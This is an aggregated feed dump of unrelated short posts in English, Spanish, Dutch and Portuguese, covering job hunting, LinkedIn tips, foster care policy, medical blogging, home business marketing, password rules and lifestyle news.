Does revealing your weaknesses in an interview mean that you are being authentic? It’s a question that came up in a conversation when discussing topics for a professional organization panel group. It’s the dreaded question that no one likes to be asked. No doubt, you shy away from telling someone your weaknesses – after all what […]

The post Revealing your weaknesses in an interview appeared first on Elephants at Work.

            

          Focus on organization culture – hit a home run        

There is research to back up that the majority of people leave an organization because they don’t like their boss and/or the organization culture. I urge you to place greater emphasis on the organization culture because that rarely changes. Here’s why. The organization culture is an important part of a decision about where you work, […]

The post Focus on organization culture – hit a home run appeared first on Elephants at Work.

            

          Stay LinkedIn with Ira Bass        

It’s my first meeting to BENG – Business Executives Networking Group run by Michael Hall, president of FranNet Carolina. The group is comprised of job seekers, employed and business networkers that span all industries. The discussion leader for today’s session is Ira Bass from Connect to Success about tips on using LinkedIn effectively. Ira calls […]

The post Stay LinkedIn with Ira Bass appeared first on Elephants at Work.

            

          Six Reasons You Did Not Get the Job        

Frustrated that you did not get the job you coveted? Perhaps one or more of these reasons on the list played a role in the missed opportunity. Consider what you might do to overcome one of these job-hunting deal killers. You are casting too wide a net. Contrary to what many career coaches or counselors […]

The post Six Reasons You Did Not Get the Job appeared first on Elephants at Work.

            

          How to Get Hired After Being Fired        

The first thing you probably are thinking about is how do I get hired after being fired again? Getting hired after being fired happens everyday, sometimes it is easier than other times. There are many reasons why you might have gotten fired – poor attendance, making a mistake on the job or poor performance such […]

The post How to Get Hired After Being Fired appeared first on Elephants at Work.

            

          Contemplating a Career Change?        

If you are thinking about a career change – you are not alone. There are many reasons why you may be thinking about that career change: You are in a dead-end job You hate or dislike your job You are ready to retire and want to finally do something that makes you excited every day […]

The post Contemplating a Career Change? appeared first on Elephants at Work.

            

          Job Hunting in December        

What better end of the year gift than a job to start the New Year. December is the month to kick your job hunting into high gear for several reasons: New Budgets Companies with end of the year budget cycles have a round of new funding available at the first of the year. When finances […]

The post Job Hunting in December appeared first on Elephants at Work.

            

          Admitting a Mistake at Work        

There will come a time when even the most conscientious employee will make a mistake at work. I am not talking about a minor mistake or error at work. We are talking about a HUGE mistake that could cause major problems for customers or management to correct. In every day situations where you make errors, […]

The post Admitting a Mistake at Work appeared first on Elephants at Work.

            

          Make it an Inclusive Holiday Season        

Consider opening your home over the holiday season to someone that is alone. It is not always obvious that someone does not have a place to go. Most people don’t advertise it and if asked if they have an invitation they may even lie and say “yes” for fear of being judged. There are many […]

The post Make it an Inclusive Holiday Season appeared first on Elephants at Work.

            

          Comment on The product-market fit by Minsi        
Hey Kevin, stumbled upon your blog via LinkedIn.. Heard from Nic u are starting a business so really, all the best! Anw, with regards to the experimentation, its really true.. The recent product development trend follows the 90-10 rule: develop 90% of the product and let the market shape its remaining 10%. While research used to precede development, it seems that both can be done concurrently today. Looking forward to seeing your product on the market soon!
          [urls] Web Services Differentiation with Service Level Agreements        
Wednesday, September 1, 2004
Dateline: China
 
The following is a sampling of my top ten "urls" for the past couple/few weeks.  By signing up with Furl (it's free), anyone can subscribe to an e-mail feed of ALL my urls (about 100-250 per week) -- AND limit by subject (e.g., ITO) and/or rating (e.g., articles rated "Very Good" or "Excellent").  It's also possible to receive new urls as an RSS feed.  However, if you'd like to receive a daily feed of my urls but do NOT want to sign up with Furl, I can manually add your name to my daily Furl distribution list.  (And if you want off, I'll promptly remove your e-mail address.)
 
Top Honors:
 
* Web Services Differentiation with Service Level Agreements, courtesy of IBM T.J. Watson; as the title suggests, this paper tackles SLAs.  See also Web Services QoS: External SLAs and Internal Policies, by the same author.  The latter paper was the invited keynote at the 1st Web Services Quality Workshop (this site provides links to abstracts for all the workshop papers as well as links to each author's personal site).
 
Other best new selections (in no particular order):
 
* Product Focused Software Process Improvement: PROFES 2004 (if you're going to read only one tech book this year, let it be this!!)
* Legacy systems strike back!!  We all know that there is a good market in servicing legacy systems.  See the following: Arriba: Architectural Resources for the Restructuring and Integration of Business Application (an introduction), Identifying Problems in Legacy Software, and Evolution of Legacy Systems.  
* Online Communities in Business: Past Progress, Future Directions, Five Keys To Building Business Relationships Online and Advantages of Using Social Software for Building Your Network.  (I can say with a fairly high level of confidence that these tools can be used to expand your business network.  Been there, done that.  Give it a try.  Do I already know you and would you like an invitation to join LinkedIn?  If the answer to both questions is "yes," let me know ...)
* Carnegie Mellon Project Aura Video (gets a bit silly at times, but the language translation component was interesting to see; the R-T example is still years away, but the idea is intriguing and this is where collaboration tools need to go)
* Innovation: Strategy for Small Fish (from the Harvard Business School; however, NVIDIA would not have been my choice for a case study)
* Stata Labs: Managing at a Distance, for Less (a pretty good case study; I firmly believe that China's systems integrators/contract developers need world-class collaboration tools and this describes one of the formats I support)
* An Authoring Technology for Multidevice Web Applications (one of my favorite topics -- and an area where I believe SIs in China can take the lead)
* Cheapware (or, "Changsha Gone Wild!!"; hey Qilu clan, are you listening?  Go, Ding, go!!)
* How To Team With A Vendor (a "must read" -- and evidently a lot of my readers already did, even though I only made a passing reference in a previous posting)
 
Examples of urls that didn't make my "Top Ten List":
 
> ITU Internet Reports 2004: The Portable Internet (looks like this might be a great series; less biased than the typical IT advisory services report -- and a much better value, too)
> Software Cost Reduction (courtesy of the <U.S.> Naval Research Lab, this paper is a bit dated, but still worth reading; addresses problems with large-scale systems, albeit a bit light on practical examples) 
> Japan IT Outsourcing 2004-2008 Forecast: IDC (might be a worthwhile purchase, especially for the Dalian-based systems integrators)
> The Power of No (Linux as a bargaining tool <see my Furl comments, too>; make Microsoft shake in their boots!!)
> Web Design Practices (a good reference site)
 
and many, many more ...
 
Cheers,
 
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
 
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
 
 
To automatically subscribe click on http://tinyurl.com/388yf .
 

          How to Add Facebook, Twitter, Yahoo!, LinkedIn, Flickr, Hotmail Accounts to Google Profile        
The launch of Google+ has brought updates and changes to many of other Google services as well. Google Profiles in one such service. Google Profiles already got a facelift a few weeks back, but that was all part of the bigger picture – the Google+ project. You can now add to connect your Facebook, Twitter, […]
          How To NOT have your name and photo abused for Linkedin advertising purposes        
Wow. Shocking. As it turns out, Linkedin has sneakily changed it’s members account settings, so that their name and face can be used in advertsing messages on the Linkedin platform. Ehrm… What?! That right. You are automatically opt-ed IN for social advertising. Unasked. Unwanted. Unpaid. I am not 100% surprised though, because Linkedin has a [...]
          LinkedIn Integration in iOS Apps        

LinkedIn is a social cum professional platform that provides opportunities for connecting to various personalities belonging to your professional areas and other areas too. Business apps or event related apps demand LinkedIn integration for gathering industrialists on a common platform to discuss issues related to...

The post LinkedIn Integration in iOS Apps appeared first on Innofied.


          Recopilación de libros interesantes para el verano        

Se acercan las vacaciones y, como habréis visto, estos días el ritmo de publicación de Blog-o-corp ha bajado un poco. Vamos, que no estoy publicando tanto como me gustaría. Es el “efecto prevacacional”, ya sabéis, ese que dice que antes de irse de vacaciones hay que dejar todo acabado y bien atado, y claro, esto aumenta el volumen (y por consiguiente el ritmo) de trabajo de forma considerable. Si a eso le sumamos que estoy acabando de perfilar mi aventura estival (de la que pronto os daré más información), pues la verdad es que el tiempo no sobra. Sin embargo, espero volver de esta aventura con las pilas cargadas y muchas novedades que contaros, porque espero aprender mucho y prometo compartirlo :) Aprendemos compartiendo, como siempre nos recuerda Marc.

Antes de que llegue el anuncio de mi aventura veraniega, quiero compartir con vosotros algunos títulos interesantes que he ido descubriendo en los últimos meses y que creo que pueden ser una buena lectura para las vacaciones. De algunos ya os he hablado, de otros tengo pendiente escribir una reseña. En cualquier caso, ahí va la propuesta:



          Podcast verhuist naar zaterdag. Google Reader exit! 8 redenen om Google+ te gebruiken...        

Zie: http://www.reputatiecoaching.nl/16

In deze ReputatieCoaching en ReputatieManagement podcast komen de volgende onderwerpen aan bod:
1. Podcast verhuist naar zaterdag
2. Google Reader exit!
3. 8 redenen om Google+ te gebruiken
4. 7 tips voor maximaliseren Google+ Authorship
5. Wat is webspam volgens Google?

Trefwoorden: Digg, Feedly, Google Authorship, Google Reader, Google+, lifehacker.com, RSS, SMS, webspam, reputatiemanagement, reputatiecoaching, reputatiecoach, SEO, Internet Marketing, reputatie management, inbound marketing, social media, sociale media, Search Engine Optimization, podcast

Over de podcast
De ReputatieCoaching en ReputatieManagement Podcast wordt wekelijks uitgebracht door Eduard de Boer, ook wel bekend als de ReputatieCoach. In de podcast brengt Eduard het laatste nieuws op het gebied van reputatiemanagement, social media, Internet Marketing, SEO (Search Engine Optimisation), ofwel zoekmachine optimalisatie en inbound marketing en geeft hij tips over hoe je je reputatie kunt verbeteren.

Je kunt de site bekijken op: http://www.reputatiecoaching.nl/

Bezoek onze social media sites:
* http://www.reputatiecoaching.nl/gplus
* http://www.reputatiecoaching.nl/facebook
* http://www.reputatiecoaching.nl/linkedin
* http://www.twitter.com/reputatiecoach1
* http://pinterest.com/reputatiecoach/
* http://www.flickr.com/photos/reputatiecoaching/
* https://vimeo.com/reputatiecoaching
* http://www.metacafe.com/f/channels/ReputatieCoaching/
* http://www.dailymotion.com/reputatiecoaching
* https://www.slideshare.net/ReputatieCoaching
* http://issuu.com/reputatiecoaching
* http://www.scribd.com/ReputatieCoaching

Autor: avatarreputatiecoaching
Tags: Digg Feedly Google Authorship Reader lifehacker.com RSS SMS webspam reputatiemanagement
gepostet: 21 Juni 2013


          Brasileiro prefere importar sêmen de doador com olho azul        

publicado no Bem-Estar

Os brasileiros preferem doadores de sêmen com olhos azuis, segundo dados de documento da Anvisa (Agência Nacional de Vigilância Sanitária). Eles representaram mais da metade das importações de sêmen (52%) entre 2014 e 2016. Em segundo lugar, ficaram olhos castanhos (24%), seguida da cor verde (13%).

baby-933097-1280

Sobre a origem étnica dos doadores, a maioria solicitada por brasileiros é de brancos causasianos (95%). Depois, seguem-se pedidos de origem asiática (21%), latina (18%), e “multiétnicos” (15%).

A importação de amostras de origem negra não apresentou relevância estatística com a Anvisa indicando o pedido de apenas 2 importações.

Ainda, a importação de sêmen cresceu 2500% entre 2011 e 2016 no País. Um dado inédito foi a observação do crescimento de importações entre casais de mulheres (279%), seguido pelo grupo de mulheres solteiras (114%) e por casais heterossexuais, em 85%.

Os números são do primeiro “Relatório de Importação de Amostras Seminais para uso em Reprodução Humana Assistida”, divulgado pela Anvisa nesta quarta-feira (9).

O documento apresenta um perfil das importações de sêmen no Brasil e, segundo a agência, tem o objetivo de aperfeiçoar as políticas de reprodução humana assistida no País.

Sobre a distribuição regional, entre de 2014 a 2016, a Anvisa autorizou a importação de 1.011 amostras. Dessas, 79% foram para bancos do sudeste, 10% para região sul, 6% para o nordeste e 5% aos bancos da região centro-oeste. A maioria dos bancos de sêmen estão em São Paulo: são 47 bancos.


          Barbeiro passa o único dia de folga cortando cabelo de moradores de rua        

Clean-cut-clean-start-2-nasir-sobhani-768x440

Publicado no Razões para acreditar

O barbeiro Nasir Sobhani, 26, usa o seu talento com as tesouras para melhorar a autoestima de pessoas que perderam quase tudo na vida. Nasir corta o cabelo de moradores de rua sem cobrar absolutamente nada por isso.

Ele vive atualmente em Melbourne, na Austrália. No seu único dia de folga, Nasir se transforma no “Street Barber”. A bordo do seu skate, ele sai às ruas para oferecer cortes de cabelo para quem não pode pagar pelo serviço. O rapaz batizou a boa ação de Clean Cut, Clean Start (“Novo Corte, Novo Início”, em tradução livre).

Nasir é ex-dependente químico e passou por períodos de reabilitação. Sua história é parecida com a de muitas dessas pessoas. Para o barbeiro, elas “precisam mesmo é de contato humano, de algum estímulo que promova o engajamento dessas pessoas para estabelecer algum grau de intimidade com seres humanos que realmente se importam com eles”.

“Lembro-me dos dias nos quais costumava me odiar, e nem mesmo me olhava no espelho sem chorar, simplesmente porque ficaria enojado de quem eu era. E pude encontrar isso em muitos de meus clientes de rua. Eles se sentem muito envergonhados por quem são”, conta Nasir.

Tudo começou há aproximadamente dois anos, depois de uma conversa com um funcionário que limpava as janelas do salão onde Nasir trabalhava anteriormente. Viciado em heroína e após ficar um mês limpo, ele quis um corte de cabelo para comemorar a conquista. Desde então, Nasir usa suas habilidades para proporcionar novos recomeços a outras pessoas.

Confira a transformação de algumas delas:

NasirSobhani15

NasirSobhani14

NasirSobhani12

NasirSobhani11

NasirSobhani9

NasirSobhani7

NasirSobhani6

NasirSobhani4scottbradshaw

NasirSobhani3scottbradshaw

NasirSobhani2scottbradshaw

NasirSobhani1scottbradshaw


          O cara que inventou aquelas regras de senha irritantes pede desculpas        

senhas-irritantes

Publicado no Hypescience

Você com certeza já foi obrigado a criar uma senha com pelo menos tantos caracteres, tantos números, tantos caracteres especiais e talvez uma letra maiúscula.

Adivinha? O cara que inventou esses padrões há quase 15 anos agora admite que eles são basicamente inúteis. E pede desculpas.

O erro

O homem em questão é Bill Burr, ex-gerente do Instituto Nacional de Padrões e Tecnologia (NIST) dos EUA.

Em 2003, Burr elaborou um guia de oito páginas sobre como criar senhas seguras, que se tornou um documento usado para tudo, desde contas de e-mail até páginas de login para seu portal bancário online.

O único problema é que Burr não sabia muito sobre como as senhas funcionavam em 2003, quando escreveu o manual. Ele certamente não era um especialista em segurança.

“Muito do que eu fiz agora me arrependo”, Burr disse recentemente ao The Wall Street Journal, admitindo que sua pesquisa em senhas provinha principalmente de um livro escrito na década de 1980, muito antes da web ser inventada.

Nem sequer é segura

Matemática simples mostra que uma senha relativamente curta com caracteres aleatórios é muito mais fácil de ser hackeada do que uma longa série de palavras fáceis de lembrar.

Por exemplo, um computador levaria 550 anos para adivinhar uma senha com quatro palavras simples (como “correto cavalo bateria grampo”), enquanto uma série absurda de caracteres aleatórios seria descoberta em cerca de três dias (por exemplo, “tr0ub4dor&3”).

É por isso que o último conjunto de diretrizes do NIST recomenda que pessoas criem senhas usando frases longas, ao invés de palavras com várias regras estranhas, como as que Bill pensava serem seguras.

As mancadas da internet

Sim, Burr está arrependido, mas não é somente culpa dele. Há quinze anos, haviam poucas pesquisas em senhas e segurança da informação, enquanto os pesquisadores agora podem aproveitar milhões e milhões de exemplos e estudos de caso para chegar a conclusões.

E Burr também não foi o único a apresentar algumas ideias lamentáveis nos primeiros dias da web. O inventor dos pop-ads, o flagelo da internet, é outro que já nos pediu desculpas. O próprio criador da internet, Tim Berners-Lee, já se lamentou pela barra dupla desnecessária e confusa nos endereços da web.

Infelizmente, não há nada que podemos fazer: a tecnologia é muitas vezes um exercício de tentativa e erro. [Gizmodo]


          9 porquices que todo casal faz, já fez ou fará (e o Dr. Bactéria reprova)        

Casal-jovem-740x360

Publicado no UOL

Relacionamento é sinônimo de intimidade, muito amor e um desejo imensurável de compartilhar, inclusive algumas nojeirinhas. Mas, se até cecê pega (e pega, mesmo), dê uma olhada nesta lista. Separamos nove porquices que os casais fazem, mas não deveriam, com a ajuda do Dr. Bactéria (ou Roberto Figueiredo, biomédico e diretor do Microbiotécnica, centro de assessoria em higiene e saneamento ambiental, em São Paulo).

Dividir chiclete e bala

04_300x300
Compartilhe amor, não compartilhe balas ou chicletes mascados. Os doces ficam impregnados com as bactérias da saliva (muito mais do que na troca do beijo). Passa gripe, herpes, gastrite, úlcera e muito mais.

Fazer xixi enquanto tomam banho

12_300x300

Geralmente, a urina é estéril. Se ninguém estiver doente, não vai transmitir nada. Mas e se tiver? E, convenhamos, tem coisa que é melhor fazer sozinho, né? Xixi é uma delas

Dividir a escova de dente

05_300x300
Juntar as escovas não faz mal só no sentido de morar junto. Deixar no mesmo copo não pode. Dividir, então, nem pensar! Ao usar a alheia, podemos colocar dentro do nosso corpo todas as bactérias que vivem ali. Em uma gota de saliva há cerca de 2 bilhões de microrganismos –que, na escova, se multiplicam. Aliás, troque a sua a cada três meses.

Usar a mesma fronha

02_300x300
Acne, micose e até a caspa, que é um tipo de inflamação, podem ser transmitidas pela fronha de travesseiro. Por isso, mais uma vez, é melhor cada um usar a sua.

Alicate, cortador e lâmina

07_300x300
Se você compartilhar esses objetos, prepare-se: vocês vão acabar dividindo coisas nada românticas, como micoses e infecções de pele. Tem necessidade?

Copos e talheres

01_300x300
Um golinho do copo dele, uma garfadinha do prato dela na sua boca… Normal, né? Melhor parar. Copos e talheres devem ser usados individualmente.

Usar a mesma toalha de banho

06_300x300
Ácaros, piolho, sarna, micoses e até o HPV podem ser transmitidos pela toalha de banho. Esse último, principalmente, se for na hora que a pessoa infectada acabou de usar, pois os vírus de doenças sexualmente transmissíveis não resistem tanto tempo fora do corpo.

Espremer o cravo alheio

09_300x300
Veja que beleza: apertar cravos e espinhas deixa germes e ácaros na ponta dos dedos e na unha, que podem ser transmitidos se você coçar o rosto, por exemplo. Por isso, nada de espremer! A pele não está boa? Procure um dermatologista.

Bucha e sabonete

13_300x300
A bucha pode ficar com restos de pele porque esfregamos ela no corpo. Para evitar mais trocas de micose, o melhor é cada um ter a sua. Para não dar confusão, compre de cores diferentes, pois é justamente esse o motivo de existirem buchas coloridas. Sobre o sabonete, não precisa de neurose e cada pessoa ter um, mas lavar e retirar os pelinhos não custa nada.

Dividir desodorante roll-on

14_300x300
O suor não tem cheiro. São as bactérias da pele da pessoa é que produzem o famoso cecê. Por isso, se o seu desodorante acabar, é melhor ficar sem usar nada a pegar o do outro emprestado. Do contrário, todos os microrganismos que ficam no produto podem passar para você.


          O que produz aquele cheiro gostoso de chuva?        

publicado na BBC

O aroma terroso produzido quando a chuva cai no solo ou nas pedras depois de um período de clima seco e quente tem um nome: petricor. Vem da palavra grega “petra”, que significa pedra, e “icor”, o fluido que corre nas veias dos deuses da mitologia grega.

autumn-leaf-in-the-rain-beautiful-hd-wallpaper-1920x1200

O nome foi dado por pesquisadores australianos em 1964, que descreveram o aroma como a combinação de óleos produzidos por plantas e o composto orgânico geosmina, que é liberado pelo solo quando chove.

Em 2015, cientistas do Instituto de Tecnologia de Massachusetts (MIT) nos Estados Unidos usaram câmeras que gravam em alta velocidade para mostrar como o cheiro da chuva chega ao ar.

Gotas de chuva prendem minúsculas bolhas de ar ao atingir o chão. As bolhas então explodem em um gás, produzindo gotículas líquidas extremamente finas que ficam suspensas no ar como o aerossol de um perfume.

O cheiro é mais forte quando a chuva é fina e quando esta cai sobre solos arenosos ou argilosos. A alta velocidade das gotas na chuva pesada torna mais difícil a produção das bolhas de ar que produzem a petricor.

Alguns cientistas acreditam que os humanos desenvolveram um gosto por esse cheiro já que os nossos antepassados dependiam da chuva para sobreviver.


          Comment on Is institutional collaboration an oxymoron? by marco guardigli        
institutions must have a quite clear identity. they can not easily change their minds. they are usually 'forced' in their own frame, quite clearly defined at the moment they were started. institutions can collaborate, but in quite formal, clearly stated, official ways. they are not spontaneous, they can not be too joyful, and they must be compliant to their serious, grey and strict etiquette. example: the catholic church can collaborate with some other institution, like the red cross. example2: the british museum can collaborate with moma for some exchange in a specific event. example3: two or more universities can define a shared agreement on programs collaboration in my opinion implies reciprocal availability for change. it is co-education, shared growth, mutual learning, acceptance of unexpected discoveries. institutions are probably fearing the unexpected, in the forms of behaviours, innovations, critical comments, anti-establishment informalism, tourettic creations. they need to frame, to classify, to include in already-seen taxonomies. but maybe we need more fluid institutions. we need to allow quicker change. we need fluid democracy, facebook countries independent from geography. we need to support the unknown sourced contributes, we need to accept even critical comments, in order to improve. we might need institutions to thrive on opinions evolutions, on ideas change, and on fluid progress, yes, but in this case how would you define the institution itself? how would you assign and define its identity? the best representation for such "new" institution could be generative art, or maybe a style, like cubism, or impressionism. a set of patterns could identify the institution, a behavioral style, a local culture, a fashion, or a trend. are there social network institutions? can we have institutions in second life? or maybe is linkedin an institution? which is the ultimate goal of an institution? opinion suggestions? public wealth? culture promotion? sense of belonging? is there somewhere the "institute for critical thinking?" good luck! @mgua
          New iPhone App "Friends" Gives Social Contact Aggregation A Warm Embrace        
The other day, a reader emailed me asking what I use as a contact manager probably thinking I had one killer solution. But I told them that sadly I have to use a combination of Gmail, MobileMe, LinkedIn, and a few other services to get include all the people I may want to contact. And that’s especially a pain on my iPhone as it involves opening several different apps and/or websites to… Read More
          Ten Years Later: Foster Care, Again         

IN late June, Congress marked the 10th anniversary of its enactment of sweeping legislation to reform the nation's child welfare system and provide foster children with greater legal safeguards. The law resulted in many significant improvements. But forces unleashed in the '80s demand a renewed commitment to these children. The ``Adoption Assistance and Child Welfare Act of 1980'' was designed to reduce foster care placements by providing services to families at risk. The law also established procedural protections, including a case review system and due process guarantees, to protect children from languishing in foster care.

Ten years later, approximately 500,000 children live in the foster care, juvenile justice, and mental health systems. An increasing number are repeat placements. The number of children in out-of-home care could rise top 840,000 by 1995, if present trends continue.

Children, families, foster parents, and caseworkers have become victims under the current, overburdened system. A 12-year-old former foster child testified before Congress that he'd had so many different placements that he couldn't remember them all. A mother told us she placed her son in foster care to get him the services he badly needed.

In Florida, a caseworker was recently convicted of child abuse for returning a two-year-old to parents who drowned the toddler because she had not been toilet trained. Caseworkers have repeatedly testified that they are understaffed and overworked. In trying to determine whether to return a child to its parents, caseworkers are now damned if they do and damned if they don't.

When the 1980 law was enacted, crack cocaine was unknown. Eight years later, over 100,000 children were born exposed to cocaine. That number could rise to 4 million by the end of this decade. The victims of crack and other drugs are prime candidates for the foster care system. In New York City, crack was a factor in nearly 9,000 child neglect cases last year - over three times as many as in 1986. In California, over 60 percent of drug exposed babies have been placed in foster care, and nationwide many more have become ``boarder babies'' - abandoned in hospitals by parents too sick, or too strung out, to care for them.

AIDS, virtually unknown in 1980, today infects hundreds of children who are abandoned and in need of care. Another leading cause of children entering the child welfare system in the '80s was child abuse. Reports of abuse have more than doubled since a decade ago, with over 2.2 million reports last year.

And a decade ago, the scourge of homelessness was only a minor concern. Today, families with children are one of the fastest growing groups among the homeless, and those children are prime candidates for foster care. In fact, some social-service agencies have compelled homeless parents to give up their children in order to qualify for shelter.

These factors were compounded by massive cuts in federal ``safety net'' child welfare and housing programs. With the ink barely dry on the 1980 foster care law, the new Reagan administration sought to repeal it and let state and local governments handle the mounting crises on their own. When Congress wouldn't let that happen, the Department of Health and Human services tried de facto repeal: funding for preventative services was opposed, state plans went unreviewed, and few audits were conducted despite growing evidence of fiscal mismanagement and soaring costs.

Fortunately, some counties and states have initiated family preservation programs to reduce dependence on foster placements, often with financial support from foundations and the private sector. Many have demonstrated success. Only 2 percent of the families served under Maryland's Intensive Family Services program, for example, required out-of-home placement.

But many states and localities can't afford their own programs to compensate for federal indifference. Legislation we recently introduced will direct greater resources toward family preservation and will assist states in developing proven, cost effective services to keep families together - such as pre-placement, reunification, post-adoption and after-care assistance, and strengthened due process protections for foster children and their parents.

It is a sad commentary on the state of domestic policies that the best action Congress can take to commemorate the 10th anniversary of our foster care law is to pass a new bill to fulfill the promise of the original reform. Sad, yes; but it would be irresponsible to allow hundreds of thousands of children to languish without a place to call home.

Become a part of the Monitor community


          Today's cartoon         

(c) Copyright 2000. The Christian Science Publishing Society

Become a part of the Monitor community


          The Five Elements Every Medical Blog Needs        

Blogging has become a vital part of the medical industry’s marketing strategy, so much so that it’s rare to see a hospital, pharmaceutical company, or even a private LASIK clinic without a blog of their own. But having a blog alone isn’t going to set you apart from the thousands of other medical bloggers you’re competing with to gain rank. To maximize your blog’s potential, you’ll need the following elements.

From author bylines to social-media-ready images, incorporate these elements to give your blog the extra boost. Your marketing will be more effective, your readers will be more responsive, and your business will thrive! 

Comments Section

Many medical practices stray from including a comments section on their blog because they fear bad publicity, not complying with HIPAA policies, or both. Furthermore, comments allow spammers and self-promoters of all kinds to write in their own messages, plague your blog with unwanted links, stir up controversy, and so on. Needless to say, a comments section will never be a 100% safe element of blogging. But you can’t do away with it and here’s why.

Comments is where you rally up support for your blogs and brand, it’s where you find new patients, where you engage your users, and build a name for yourself. Without it, you’re missing out on potentially major publicity. Just keep an eye on it, respond to positive and negative feedback, and keep your cool. Monitoring your comments will keep you active in discussions and establish you as a professional authority that patients can trust. 

Author Byline

Leaving the byline out of your blog can force your articles to lose credentials and confidence. People don’t just want to read quality blog posts with solid information, they want to know their information is coming from a reputable source. A byline sets you up as the expert they need to listen to.

While your website should already have a biography with your information, credentials, and accomplishments, a small author byline at the end of each blog post will give it an extra boost. There are even several WordPress plugins you can use to link all of the articles you’ve written together and attach them to your Google Authorrank, a great way to gain a little extra SEO juice. 

Social Media Links

Blogs are meant to be shared! You want your readers buzzing so much that they’re willing to share your post to their Facebook feeds. This means reaching a wider audience and potentially nabbing a few extra patients. But if those social media links are missing, sharing your blog suddenly became a pretty inconvenient task. 

Include links to all major social media platforms, including Facebook, Twitter, Google+, LinkedIn, and even Pinterest and Reddit. You want your readers to have as many options as possible because people are more likely to shop (or make an appointment with a doctor) after they see a recommendation from a friend. Social media sharing might as well count as personal recommendations; so let your users share! 

Search Feature

There are plenty of ways to incorporate a search feature with your medical blog, including a search bar and an archive of all the topics you’ve previously written about. Not matter how you do it, having a database for readers to browse through is a win-win for your business and your readers. Potential patients can find more articles like the ones they’ve just read or search for blogs by topics that are interesting to them, therefore staying engaged with your website for a longer period of time. And when your users are this engaged, they are much more likely to convert.

Images

Images are crucial to a blog’s success and you simply can’t run a blog with having at least one picture per blog post. First of all, images make complicated concepts much easier to grasp, especially to the general population that didn’t go to med school. Think about how motivating “before and after” photos are rather than just reading about a diet plan itself. Having a visual supplement really gets a user’s mind into gear.

Images are also great for social media sharing. From Facebook to Pinterest, social media is becoming more centered around visual content, meaning not only are the platforms now better designed to display high-quality graphics, but people are now much more likely to click on a post with an associated image. Since our eyes are naturally drawn to pictures, you should use more to generate buzz around the web. Just be sure you own the images and that they relate to your blog post. 

Blogging isn’t entirely about the blog posts. To truly have a blog post succeed these days, you need to have the elements that can support it and promote it. Let your readers comment, see whom they’re learning from, and have an easy time searching and sharing your content. Not only can your blog succeed, but so can your business.


Pete Wise is a copywriter with 20/20 Institute. We provide LASIK services in Colorado. See what I'm posting on Facebook

          Home Business Marketing Tips For The Real World        
With the internet being in everyone's face nowadays, when many home based business people think of marketing they think of guest blogging, LinkedIn, Facebook pages, email campaigns, Youtube videos and click ads. But for many work at home businesses the best customers and the best ways to get them are right in their home town. With a bit of planning, elbow grease and talking you can find new customers without touching your computer.

Working With Charities

No matter your business, donating time, money, or your expertise to local charities, sports teams and schools are great for publicity.If you makes crafts, you can donate some of your products to a charity auction or for a contest. Your name will be prominently displayed as helping your community, and your product will be seen in your community.  

Donating your services are also quite useful, either completely free or at cost. Whether you design the charities website, mow their lawn, or help plan and prepare a banquet, the charity will publicly thank you, and you can get a nice testimonial out of it.

Even if you don't have a product or service the charity or community group can use, simply donating money, will almost always get you a nice little plaque and a nice mention on a website and at some of the events.
Showing community spirit and letting people know how nice you are, will always look good.

Networking Around Town

Is there a local Toastmasters, business association, writing group, charity, or hobby club that you are somewhat interested in? 

Join them.
Working from home can be isolating, so getting out and meeting people will keep you from feeling all alone, more importantly by making connections in real life, you are creating strong bonds that can lead to business. Even if a group doesn't seem like it will be good for your business, the people in it know other people who may need you. 

Don't join a group if you'll just be sitting there bored out of your skull, and don't join a group simply to sell your product. Show genuine interest, build up contacts, and casually bring up your business when people ask what you do.

Free Classes and Seminars

This will require work and you have to do it well, but offering free courses in your area of expertise can be one of the best ways to get business. Using your new community network, community bulletin boards, some internet advertising and even fliers, let people know you are offering a free one day class. Make sure to keep track of how many people should be coming by having them phone or preferably emailing you, and ensure you have access to a large enough room with all the necessary facilities.

This will cost you money, unless you can get a room and all the equipment for free, and you have to prepare very carefully, so don't rush into this or it will be a disaster. But you have people who are really interested in what you have to say as a captive audience, if you're prepared you can sell them anything. And even if you only get 2 or 3 people when you were expecting 50, roll with it, make the class more intimate, and make sure that handful of people will tell everyone they know how great you are.

These three methods are some of the best ways to get clients, get recognition and get money for your business within your community. Remember there is a world outside of your computer, and it's full of people waiting to hire you and buy your product. All you have to do is let them know your there.


Dan Clarke is a personal coach with a passion for helping people who work from home, whether they're simply telecommuting or have their own home business. With three of his own at home businesses he has found many ways to balance his working life and his home life, allowing him to support and enjoy time with his family.

Find out more at his website,  Be Happy Working at Home.

          You May Think Emails are Boring – But Here’s Why They Could Make You a Lot of Money…        
The exciting things to be running with today are usually social – Twitter, Facebook, LinkedIn, Pinterest, Google+ and so on. But our new research is sobering. And a timely reality check. Yes social media is exciting, and for some niche…
          â€œThe New LinkedIn” – Come to My Free Presentation!        
Within the past week, LinkedIn has rolled out a whole new menu system, and changed the way you can use the site for your job hunt. I’ll be covering this and more in my presentation, “THE NEW LINKEDIN”, sponsored by Career Transitions of Greater Boston, When: Tuesday June 18th, from 10:00 a.m. -12:30 p.m. Where: […]
          Recommendation        
I was so happy earlier this week to get this unsolicited LinkedIn recommendation from Jonathan Allen: “Arnie is an experienced Job Coach who really knows what it takes to land the interview. I gave Bose my very best resume, cover letter and follow ups, but still got a refusal. Arnie then put forward a better […]
          Invitation To My Next LinkedIn Presentation        
I hope to see you at my next presentation! WHAT EVERY JOB HUNTER NEEDS TO KNOW ABOUT LINKEDIN Wednesday, May 22nd from 6:00-7:15pm Career Source, 186 Alewife Brook Parkway, Cambridge MA 3rd floor of Fresh Pond Shopping Center near the Alewife T Station. There will also be an opportunity for networking along with refreshments. In […]
          LinkedIn’s No-CSO and my Personal Data.        
The one thing that kept me thinking on a flight the other day […]
          Finding True Love         

